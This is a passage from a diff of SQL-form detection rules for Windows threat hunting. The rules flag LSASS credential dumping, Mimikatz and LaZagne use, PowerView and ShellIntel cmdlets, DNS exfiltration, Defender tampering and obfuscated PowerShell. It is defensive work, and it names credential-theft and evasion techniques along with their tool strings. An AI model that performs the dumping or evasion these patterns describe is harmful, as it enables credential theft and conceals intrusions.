GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' 
OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR 
(SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", + "title": "Suspicious Export-PfxCertificate", + 
"id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": "test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1552.004" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' 
ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" - ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" - }, - { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" - ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" - }, - { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", 
@@ -4019,52 +3939,32 @@ "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" - ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" - }, - { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "status": "test", - "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "status": "test", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), 
Tobias Michalski (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], @@ -4073,9 +3973,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { "title": "Potential WinAPI Calls Via PowerShell Scripts", 
@@ -4098,1569 +3998,1501 @@ "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - 
"id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' 
OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE 